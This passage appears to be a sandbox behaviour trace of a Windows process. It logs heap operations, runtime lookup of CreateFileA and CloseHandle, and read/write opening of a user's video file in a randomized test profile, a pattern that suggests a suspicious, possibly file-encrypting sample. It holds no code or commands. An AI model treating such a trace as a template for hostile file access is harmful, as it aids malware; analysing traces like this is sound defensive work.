RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0197.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd8e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0197.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.047] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0197.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0197.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0197.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0197.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", cchWideChar=96, lpMultiByteStr=0x9a5de0, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", lpUsedDefaultChar=0x0) returned 96 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.048] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\0vlshoaoyv07rlgs7cfh.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=96, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0197.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=96, lpWideCharStr=0x9c3478, cchWideChar=96 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv") returned 96 [0197.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0197.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0197.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.051] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.053] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0197.053] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.054] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.055] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0197.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.055] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0197.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.056] CloseHandle (hObject=0x158) returned 1 [0197.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0197.056] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.056] HeapFree (in: 